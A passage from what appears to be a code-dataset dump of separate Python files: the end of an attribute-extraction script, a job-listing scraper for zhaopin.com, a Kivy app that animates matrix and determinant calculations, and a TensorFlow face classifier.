Annotation = \"\"\n query_number = 1\n \n igAttr = IgAttributes(XYDecisionPath, QueryEntityPath, EntityAttrPath, AnnotationPath, training_query_number)\n igAttr.print_attr() \n\n\n# from nltk.corpus import wordnet as wn\n# china = wn.synsets('Ford') \n## china = wn.synset('china.n.01') \n# for l in china: print l\n# support = wn.synset('united.n.01')\n# support2 = wn.synset('states.n.01')\n# for c in china:\n# print c\n# print 'china-year', wn.path_similarity(c,support) #no output\n# print 'china-russia', wn.path_similarity(c,support2) #get an output 0.08333 \n\n ","sub_path":"out/production/FacetingEval/Query/EntityExtractionSystem_03_2015/src/IgAttributes.py","file_name":"IgAttributes.py","file_ext":"py","file_size_in_byte":18669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294041901","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/6 13:08\n# @Author : Winspain\n# @File : findJob.py\n# @Software: PyCharm\nimport requests\nimport re\nimport xlwt\n\ndef get_JobUrl():\n urls = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E6%9D%AD%E5%B7%9E&kw=crc&sm=0&p=1'\n #urls = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E6%9D%AD%E5%B7%9E&kw=%E6%B5%8B%E8%AF%95&p=1&isadv=0'\n # 
jobDetalUrls = 'http://jobs.zhaopin.com/263940938257473.htm?ssidkey=y&ss=201&ff=03&sg=96fe6a13f5144b4187610cb4fd28450f&so=3'\n #jl:杭州 kw:crc sm:0 p:1\n response = requests.get(urls).text\n data = re.findall(r'par=(.*)',response)\n for lines in data:\n getHref = re.findall(r'href=\\\"(.*)\" target=\"_blank\">',str(lines))\n geTail = str(re.findall(r'\\\"(.*)\\\" href',lines)).replace(';','').replace('amp','')\n wholeUrl = (str(getHref) + '?' + str(geTail)).replace('\\'][\\'','').replace('\\']','').replace('[\\'','')\n with open('jobUrl.txt','a') as f:\n f.writelines(wholeUrl + '\\n')\n\ndef jobDetal():\n with open('jobUrl.txt','r') as f:\n wb = xlwt.Workbook()\n sh = wb.add_sheet('智联招聘',cell_overwrite_ok=True)\n count = 1\n for lines in f.readlines():\n response = requests.get(lines.strip()).text\n salary = re.findall(r'月薪:(.*)/月', response)\n jobNums = re.findall(r'招聘人数:(.*)人', response)\n workAddress = re.findall(r'
\s*(.*)\s*
', response)\n workAddress = re.findall(r'[\\u4e00-\\u9fa5]+',str(workAddress))\n compName = re.findall(r'Str_CompName = \"(.*)\";', response)\n description = re.findall(r'SWSStringCutStart -->(.*)', size_hint_x = .1))\r\n\t\tself.m2 = Matriz_label_m(lista = mat2, size_hint_x = .45)\r\n\t\tself.add_widget(self.m2)\r\n\t\tself.h = len(self.m1.matriz) - 1\r\n\t\tself.v2 = len(self.m2.matriz[0]) - 1\r\n\t\tself.v1 = len(self.m2.matriz) - 1\r\n\t\tClock.schedule_interval(self.muda, 0.5)\r\n\t\r\n\tdef muda(self, *args):\r\n\t\tprint(self.m1.matriz)\r\n\t\tprint('separacao')\r\n\t\tprint(self.m2.matriz)\r\n\t\tself.m1.atualizar_h(self.m1.matriz[self.m][0])\r\n\t\tself.m2.atualizar_v(self.m2.matriz[self.v1][self.m], cor=(0,1,0,1))\r\n\t\tself.m += 1\r\n\t\tif self.m > self.h:\r\n\t\t\tself.m = 0\r\n\t\r\n\t\r\n\r\nclass Matriz_dupla(BoxLayout):\r\n\t\r\n\tdef __init__(self, mat1, mat2, sinal, **kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.add_widget(Matriz_label(lista = mat1, size_hint_x = .45))\r\n\t\tself.add_widget(Label(text=sinal, size_hint_x = .1))\r\n\t\tself.add_widget(Matriz_label(lista = mat2, size_hint_x = .45))\r\n\r\nclass Matriz_label(BoxLayout):\r\n\t\r\n\tdef __init__(self, lista, **kw):\r\n\t\tsuper(Matriz_label, self).__init__(**kw)\r\n\t\tself.spacing = 10\r\n\t\tlinhas = len(lista)\r\n\t\tcols = len(lista[0])\r\n\t\t\r\n\t\tif linhas <= 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\r\n\t\telif linhas <= 4 and cols > 4:\r\n\t\t\tcol1 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tcol2 = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcol3 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tcol1.add_widget(Label_branca(text=str(elemento[0])))\r\n\t\t\t\tcol2.add_widget(Label_branca(text=str(elemento[1])))\r\n\t\t\t\tcol3.add_widget(Label_branca(text=str(elemento[-1])))\r\n\t\t\tself.add_widget(col1)\r\n\t\t\tself.add_widget(col2)\r\n\t\t\tself.add_widget(Label(text=('. . .')))\r\n\t\t\tself.add_widget(col3)\r\n\r\n\t\telif linhas > 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista[0:2]:\r\n\t\t\t\tlinha = BoxLayout(spacing=10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\t\tself.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[-1]:\r\n\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\tlinha2.add_widget(label)\r\n\t\t\tself.add_widget(linha2)\r\n\r\n\t\telif linhas > 4 and cols > 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlinha1 = BoxLayout(spacing=10)\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tlinha4 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0][0:2]:\r\n\t\t\t\tlinha1.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha1.add_widget(Label(text='. . .'))\r\n\t\t\tlinha1.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[1][0:2]:\r\n\t\t\t\tlinha2.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha2.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[-1][0:2]:\r\n\t\t\t\tlinha4.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha4.add_widget(Label(text='. . 
.'))\r\n\t\t\tlinha4.add_widget(Label_branca(text=str(lista[-1][-1])))\r\n\t\t\tself.add_widget(linha1)\r\n\t\t\tself.add_widget(linha2)\r\n\t\t\tself.add_widget(Label(text='. . .'))\r\n\t\t\tself.add_widget(linha4)\r\n\r\nclass Det_3(BoxLayout):\r\n\t\r\n\tm = 0\r\n\tprodp = []\r\n\tprods = []\r\n\t\r\n\tdef __init__(self, mat1, local, **kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.local = local\r\n\t\tself.prodp = []\r\n\t\tself.prods = []\r\n\t\tm = 0\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, det=True, size_hint_x = .6)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tClock.schedule_interval(self.info, 0.5)\r\n\t\tClock.schedule_once(self.listra, 2)\r\n\t\t\r\n\tdef listra(self, *args):\r\n\t\tself.m1.determinante_3()\r\n\t\t\r\n\t\r\n\tdef info(self, *args):\r\n\t\tprod = float(self.m1.matriz[self.m][2].ids.texto.text) * float(self.m1.matriz[self.m+1][1].ids.texto.text) * float(self.m1.matriz[self.m+2][0].ids.texto.text)\r\n\t\tself.prods.append(prod)\r\n\t\tm1 = Mensagem(text = \"{} × {} × {} = {:.2f}\".format(self.m1.matriz[self.m][2].ids.texto.text, self.m1.matriz[self.m+1][1].ids.texto.text, self.m1.matriz[self.m+2][0].ids.texto.text, prod), font_name = 'math', halign = 'center', color = (1,0,0,1))\r\n\t\t\r\n\t\tprod2 = float(self.m1.matriz[self.m][0].ids.texto.text) * float(self.m1.matriz[self.m+1][1].ids.texto.text) * float(self.m1.matriz[self.m+2][2].ids.texto.text)\r\n\t\tself.prodp.append(prod2)\r\n\t\tm2 = Mensagem(text = \"{} × {} × {} = {:.2f}\".format(self.m1.matriz[self.m][0].ids.texto.text, self.m1.matriz[self.m+1][1].ids.texto.text, self.m1.matriz[self.m+2][2].ids.texto.text, prod2), font_name = 'math', halign = 'center', color = (0,1,0,1))\r\n\t\t\t\r\n\t\tself.m+= 1\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\tbox.add_widget(m1)\r\n\t\tbox.add_widget(m2)\r\n\t\t#self.local.ids.p.add_widget(m1)\r\n\t\t#self.local.ids.p.add_widget(m2)\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\t\r\n\t\tif self.m >= 3:\r\n\t\t\tClock.unschedule(self.info)\r\n\t\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\tdet = sum(self.prodp) - sum(self.prods)\r\n\t\t\tdet = Fraction(det).limit_denominator()\r\n\t\t\tmr = Mensagem(text = '({} + {} + {}) - ({} + {} + {}) = {}'.format(self.prodp[0], self.prodp[1], self.prodp[2], self.prods[0], self.prods[1], self.prods[2], det), font_name = 'math', halign='center', color=(0,0,0,1))\r\n\t\t\tbox.add_widget(mr)\r\n\t\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\nclass Det_2(BoxLayout):\r\n\t\r\n\tm = 0\r\n\tprod = []\r\n\t\r\n\tdef __init__(self, mat1, local,**kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.local = local\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, size_hint_x = .6)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tClock.schedule_once(self.info, 0.5)\r\n\t\tClock.schedule_once(self.listra, 1.5)\r\n\t\t\r\n\t\r\n\tdef listra(self, *args):\r\n\t\tself.m1.determinante_2()\r\n\t\r\n\tdef info(self, *args):\r\n\t\tprod2 = float(self.m1.matriz[0][1].ids.texto.text) * float(self.m1.matriz[1][0].ids.texto.text)\r\n\t\tm2 = Mensagem(text = \"{} × {} = {:.2f}\".format(self.m1.matriz[0][1].ids.texto.text, self.m1.matriz[1][0].ids.texto.text, prod2), font_name = 'math', halign = 'center', color = (0,1,0,1))\r\n\t\t\r\n\t\tprod = 
float(self.m1.matriz[0][0].ids.texto.text) * float(self.m1.matriz[1][1].ids.texto.text)\r\n\t\tm1 = Mensagem(text = \"{} × {} = {:.2f}\".format(self.m1.matriz[0][0].ids.texto.text, self.m1.matriz[1][1].ids.texto.text, prod), font_name = 'math', halign = 'center', color = (1,0,0,1))\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\r\n\t\tbox.add_widget(m2)\r\n\t\tbox.add_widget(m1)\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\r\n\t\tbox.add_widget(Mensagem(text = '{} - {} = {}'.format(prod, prod2, Fraction(prod - prod2).limit_denominator()), halign = 'center', font_name = 'math', color = (0,0,0,1)))\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\r\n\r\nclass Matriz_multi(BoxLayout):\r\n\t\r\n\tn = 0\r\n\tm = 0\r\n\t\r\n\tdef __init__(self, mat1, mat2, sinal,**kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, size_hint_x = .45)\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Label(text=sinal, size_hint_x = .1))\r\n\t\tself.m2 = Matriz_label_m(lista = mat2, size_hint_x = .45)\r\n\t\tself.add_widget(self.m2)\r\n\t\tself.h = len(self.m1.matriz) - 1\r\n\t\tself.v2 = len(self.m2.matriz[0]) - 1\r\n\t\tself.v1 = len(self.m2.matriz) - 1\r\n\t\tClock.schedule_interval(self.muda, 0.5)\r\n\t\r\n\tdef muda(self, *args):\r\n\t\tprint(self.m1.matriz)\r\n\t\tprint('separacao')\r\n\t\tprint(self.m2.matriz)\r\n\t\tself.m1.atualizar_h(self.m1.matriz[self.m][0])\r\n\t\tself.m2.atualizar_v(self.m2.matriz[self.v1][self.n], cor=(1,0,0,1))\r\n\t\tself.n += 1\r\n\t\tif self.n > self.v2:\r\n\t\t\tself.n = 0\r\n\t\t\tself.m += 1\r\n\t\tif self.m > self.h:\r\n\t\t\tself.m = 0\r\n\r\nclass Matriz_label_m(BoxLayout):\r\n\t\r\n\tmatriz = []\r\n\t\r\n\t\r\n\t\r\n\tdef __init__(self, lista, det=False, **kw):\r\n\t\tsuper(Matriz_label_m, self).__init__(**kw)\r\n\t\tself.matriz = []\r\n\t\tself.spacing = 10\r\n\t\tlinhas = len(lista)\r\n\t\tcols = len(lista[0])\r\n\t\t\r\n\t\tif linhas <= 4 and cols <= 4 and det == False:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\t#li = []\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\t\t#li.append(label)\r\n\t\t\t\t\r\n\t\t\t\t#self.matriz.append(li)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\telif linhas <= 4 and cols <= 4 and det == True:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlis = []\r\n\t\t\tdados = []\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\tli = []\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\t\tli.append(label)\r\n\t\t\t\tdados.append(li)\r\n\t\t\t\tlis.append(linha)\r\n\t\t\tprint(lis)\r\n\t\t\t#kk = kkk\r\n\t\t\t\r\n\t\t\tcima = BoxLayout(spacing=10)\r\n\t\t\tbaixo = BoxLayout(spacing=10)\r\n\t\t\tcima.add_widget(Label_branca(text= str(lista[2][0])))\r\n\t\t\tcima.add_widget(Label_branca(text = ''))\r\n\t\t\tcima.add_widget(Label_branca(text = str(lista[2][2])))\r\n\t\t\t\r\n\t\t\tbaixo.add_widget(Label_branca(text=str(lista[0][0])))\r\n\t\t\tbaixo.add_widget(Label_branca(text=''))\r\n\t\t\tbaixo.add_widget(Label_branca(text= str(lista[0][2])))\r\n\t\t\t\r\n\t\t\tlis.insert(0, cima)\r\n\t\t\tlis.append(baixo)\r\n\t\t\tprint(lis)\r\n\t\t\t\r\n\t\t\tfor i in lis:\r\n\t\t\t\tself.add_widget(i)\r\n\r\n\t\telif linhas <= 4 and 
cols > 4:\r\n\t\t\tcol1 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tcol2 = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcolp = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcol3 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tcol1.add_widget(Label_branca(text=str(elemento[0])))\r\n\t\t\t\tcol2.add_widget(Label_branca(text=str(elemento[1])))\r\n\t\t\t\tcolp.add_widget(Label_branca(text='...'))\r\n\t\t\t\tcol3.add_widget(Label_branca(text=str(elemento[-1])))\r\n\t\t\tself.add_widget(col1)\r\n\t\t\tself.add_widget(col2)\r\n\t\t\t#self.add_widget(Label(text=('. . .')))\r\n\t\t\tself.add_widget(colp)\r\n\t\t\tself.add_widget(col3)\r\n\t\t\t\r\n\r\n\t\telif linhas > 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista[0:2]:\r\n\t\t\t\tlinha = BoxLayout(spacing=10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\t\tlinhap = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0]:\r\n\t\t\t\tlinhap.add_widget(Label_branca(text='...'))\r\n\t\t\tself.add_widget(linhap)\r\n\t\t\t#self.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[-1]:\r\n\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\tlinha2.add_widget(label)\r\n\t\t\tself.add_widget(linha2)\r\n\r\n\t\telif linhas > 4 and cols > 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlinha1 = BoxLayout(spacing=10)\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tlinhap = BoxLayout(spacing=10)\r\n\t\t\tlinha4 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0][0:2]:\r\n\t\t\t\tlinha1.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha1.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha1.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[1][0:2]:\r\n\t\t\t\tlinha2.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha2.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha2.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in range(1,len(lista[0])):\r\n\t\t\t\tlinhap.add_widget(Label_branca(text='...'))\r\n\t\t\t\t\r\n\t\t\tfor num in lista[-1][0:2]:\r\n\t\t\t\tlinha4.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha4.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha4.add_widget(Label_branca(text=str(lista[-1][-1])))\r\n\t\t\tself.add_widget(linha1)\r\n\t\t\tself.add_widget(linha2)\r\n\t\t\tself.add_widget(linhap)\r\n\t\t\t#self.add_widget(Label(text='. . 
.'))\r\n\t\t\tself.add_widget(linha4)\r\n\t\t\r\n\t\t\r\n\t\tif linhas <= 4 and cols > 4:\r\n\t\t\tcol1 = col1.children[::-1]\r\n\t\t\tprint(len(col1))\r\n\t\t\t#kk = kkk\r\n\t\t\tcol2 = col2.children[::-1]\r\n\t\t\tcolp = colp.children[::-1]\r\n\t\t\tcol3 = col3.children[::-1]\r\n\t\t\tm = 0\r\n\t\t\tfor c in range(0, linhas):\r\n\t\t\t\tli = []\r\n\t\t\t\tli.append(col1[c])\r\n\t\t\t\tli.append(col2[c])\r\n\t\t\t\tli.append(colp[c])\r\n\t\t\t\tli.append(col3[c])\r\n\t\t\t\tself.matriz.append(li)\r\n\t\t\t\t\r\n\t\t\tprint(self.matriz)\r\n\t\t\t#kk = kkk\r\n\t\telse:\r\n\t\t\tfor c in self.children[::-1]:\r\n\t\t\t\t\tli = []\r\n\t\t\t\t\tfor child in c.children[::-1]:\r\n\t\t\t\t\t\tli.append(child)\r\n\t\t\t\t\tself.matriz.append(li)\r\n\t\t\t\r\n\t\tprint(self.matriz)\r\n\t\t#k = kkk\r\n\t\t\r\n\tdef atualizar_v(self, p, cor,*args):\r\n\t\t\r\n\t\t#kk = kkk\r\n\t\tx1 = p.x\r\n\t\ty1 = p.y\r\n\t\tw = p.width\r\n\t\th = 0\r\n\t\tfor c in range(0, len(self.matriz)):\r\n\t\t\th += self.matriz[c][0].height\r\n\t\th += 10*(len(self.matriz)-1)\r\n\t\t#h = self.matriz[0][0].height +self.matriz[1][0].height + self.matriz[2][0].height + self.matriz[3][0].height + 10*3\r\n\t\tself.canvas.before.clear()\r\n\t\twith self.canvas.before:\r\n\t\t\tColor(rgba= cor)\r\n\t\t\tLine(rectangle=(x1,y1,w,h), width = 5)\r\n\t\t\t\r\n\t\r\n\tdef atualizar_h(self, p, *args):\r\n\t\t\r\n\t\t#kk = kkk\r\n\t\tx1 = p.x\r\n\t\ty1 = p.y\r\n\t\th = p.height\r\n\t\tw = 0\r\n\t\tfor c in range(0, len(self.matriz[0])):\r\n\t\t\tw += self.matriz[0][c].width\r\n\t\tw += 10 * (len(self.matriz[0])-1)\r\n\t\r\n\t\t#w = self.matriz[0][0].width +self.matriz[0][1].width + self.matriz[0][2].width + self.matriz[0][3].width + 10*3\r\n\t\tself.canvas.before.clear()\r\n\t\twith self.canvas.before:\r\n\t\t\tColor(rgba= (1,0,0,1))\r\n\t\t\tLine(rectangle=(x1,y1,w,h), width = 5)\r\n\t\t\t\r\n\t\r\n\tdef determinante_2(self, *args):\r\n\t\tself.canvas.after.clear()\r\n\t\twith self.canvas.after:\r\n\t\t\tColor(rgba = (1,0,0,1))\r\n\t\t\tLine(points=(self.matriz[0][0].center_x, self.matriz[0][0].center_y,self.matriz[1][1].center_x, self.matriz[1][1].center_y), width=5)\r\n\t\t\tColor(rgba = (0,1,0,1))\r\n\t\t\tLine(points=(self.matriz[0][1].center_x, self.matriz[0][1].center_y,self.matriz[1][0].center_x, self.matriz[1][0].center_y), width=5)\r\n\t\t\t\r\n\t\t\r\n\tdef determinante_3(self, *args):\r\n\t\tm = 0\r\n\t\tself.canvas.after.clear()\r\n\t\twith self.canvas.after:\r\n\t\t\tfor c in range(0,3):\r\n\t\t\t\tColor(rgba = (1,0,0,1))\r\n\t\t\t\tLine(points=(self.matriz[m][2].center_x, self.matriz[m][2].center_y,self.matriz[m+1][1].center_x, self.matriz[m+1][1].center_y,self.matriz[m+2][0].center_x, self.matriz[m+2][0].center_y), width=5)\r\n\t\t\t\tColor(rgba = (0,1,0,1))\r\n\t\t\t\tLine(points=(self.matriz[m][0].center_x, self.matriz[m][0].center_y,self.matriz[m+1][1].center_x, self.matriz[m+1][1].center_y,self.matriz[m+2][2].center_x, self.matriz[m+2][2].center_y), width=5)\r\n\t\t\t\t\r\n\t\t\t\tm+=1\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\r\nclass Label_branca(BoxLayout):\r\n\t\r\n\ttexto = ''\r\n\t\r\n\tdef __init__(self, text, **kw):\r\n\t\tsuper(Label_branca, self).__init__(**kw)\r\n\t\tself.ids.texto.text = text\r\n\t\t\r\n\r\n\r\nclass Fundo(BoxLayout):\r\n\tpass\r\n\r\n\r\n \r\nclass Main(App):\r\n \r\n def build(self):\r\n \treturn Juntos()\r\n \r\n \r\nif __name__ == '__main__':\r\n Main().run() 
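# A minimal, GUI-free sketch of the arithmetic that Det_3 animates above:
# the Rule of Sarrus for 3x3 determinants. The helper name sarrus_det_3 is
# illustrative and not part of the original app; the green/red lines drawn
# by determinante_3() correspond to the added/subtracted diagonal products here.
def sarrus_det_3(m):
    # "Down" diagonals are added, "up" diagonals are subtracted.
    pos = sum(m[0][c % 3] * m[1][(c + 1) % 3] * m[2][(c + 2) % 3] for c in range(3))
    neg = sum(m[0][c % 3] * m[1][(c - 1) % 3] * m[2][(c - 2) % 3] for c in range(3))
    return pos - neg

assert sarrus_det_3([[1, 2, 3], [4, 5, 6], [7, 8, 10]]) == -3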
\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"273119170","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport random\nimport numpy as np\nimport tensorflow as tf\n\nlabel_dict = {\n 'akb': 0, 'saka': 1\n}\n\nu'''\n データの読み込み\n INPUT:data_type | test/train\n'''\ndef load_data(data_type):\n filenames, images, labels = [], [], []\n\n # os.walkでfacesフォルダ内をサーチする\n # filter(func, iter):iterをfuncで処理してTrueを返したものだけをiterObjとする\n u''' faces下でdata_typeフォルダ下で、長さのあるものだけ取り出したiterObjをつくる\n これを root,_(dirs),filesでうけとり、filenamesにどんどん入れる。その過程で\".\"から始まる\n ファイルについては無視する。(.DS_Storeとか)\n '''\n walk = filter(lambda _: not len(_[1]) and data_type in _[0], os.walk('faces'))\n for root, _, files in walk:\n filenames += ['{}/{}'.format(root, _) for _ in files if not _.startswith('.')]\n \n # ファイルをランダムに並び替える\n random.shuffle(filenames)\n\n # ファイルを読みこみ、サイズを調整し、配列に落とし込む\n # channel = 1 :grayscale, 3:RGB\n images = map(lambda _: tf.image.decode_jpeg(tf.read_file(_), channels=3), filenames)\n images = map(lambda _: tf.image.resize_images(_, [32, 32]), images)\n images = map(lambda _: tf.reshape(_, [-1]), images)\n\n for filename in filenames:\n label = np.zeros(2)\n for k, v in label_dict.items(): # kはラベル文字列, vはインデックス(正解の箇所だけ1で他は0になる)\n if k in filename:\n label[v] = 1.\n labels.append(label) \n\n return list(images), labels, filenames\n\n\ndef get_batch_list(l, batch_size):\n # [1, 2, 3, 4, 5,...] -> [[1, 2, 3], [4, 5,..]]\n return [np.asarray(l[_:_+batch_size]) for _ in range(0, len(l), batch_size)]\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef inference(images_placeholder, keep_prob):\n # Convolution layer\n x_image = tf.reshape(images_placeholder, [-1, 32, 32, 3])\n W_conv1 = weight_variable([5, 5, 3, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\n # Pooling layer\n h_pool1 = max_pool_2x2(h_conv1)\n\n # Convolution layer\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n # Pooling layer\n h_pool2 = max_pool_2x2(h_conv2)\n\n # Full connected layer\n W_fc1 = weight_variable([8 * 8 * 64, 1024])\n b_fc1 = bias_variable([1024])\n h_pool2_flat = tf.reshape(h_pool2, [-1, 8 * 8 * 64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # Dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n # Full connected layer\n W_fc2 = weight_variable([1024, 2])\n b_fc2 = bias_variable([2])\n\n return tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\nu'''\nメイン関数\n'''\ndef main():\n with tf.Graph().as_default():\n # trainフォルダおよびtestフォルダ下の画像をラベル付きでロードする\n train_images, train_labels, filenames = load_data('train')\n test_images, test_labels ,filenames = load_data('test')\n \n # 入力xのフォーマット定義:[入力数, 画像情報(32*32*3)]\n x = tf.placeholder('float', shape=[None, 32 * 32 * 3]) # 32 * 32, 3 channels\n # 出力yのフォーマット定義:[入力数, 結果クラス数(2)]\n y_ = tf.placeholder('float', shape=[None, 2]) # 2 classes\n\n # prob\n keep_prob = tf.placeholder('float')\n\n y_conv = 
inference(x, keep_prob)\n\n # Loss function\n cross_entropy = -tf.reduce_sum(y_ * tf.log(y_conv))\n tf.summary.scalar('cross_entropy', cross_entropy)\n # Minimize cross entropy by using SGD\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n # Accuracy\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n tf.summary.scalar('accuracy', accuracy)\n\n saver = tf.train.Saver()\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n summary_op = tf.summary.merge_all()\n summary_writer = tf.summary.FileWriter('./logs', sess.graph)\n\n batched_train_images = get_batch_list(train_images, 25)\n batched_train_labels = get_batch_list(train_labels, 25)\n\n train_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(train_images)))\n test_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(test_images)))\n train_labels, test_labels = np.asarray(train_labels), np.asarray(test_labels)\n\n # Train\n for step, (images, labels) in enumerate(zip(batched_train_images, batched_train_labels)):\n images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, images))\n sess.run(train_step, feed_dict={ x: images, y_: labels, keep_prob: 0.5 })\n train_accuracy = accuracy.eval(feed_dict = {\n x: train_images, y_: train_labels, keep_prob: 1.0 })\n print(\"step:\"+str(step))\n print(\"accracy:\"+str(train_accuracy))\n #print \"step {0} training accuracy {1}\".format(step, train_accuracy)\n summary_str = sess.run(summary_op, feed_dict={\n x: train_images, y_: train_labels, keep_prob: 1.0 })\n summary_writer.add_summary(summary_str, step)\n # Test trained model\n test_accuracy = accuracy.eval(feed_dict = {\n x: test_images, y_: test_labels, keep_prob: 1.0 })\n print (\"test accuracy\"+str(test_accuracy))\n # Save model\n save_path = saver.save(sess, 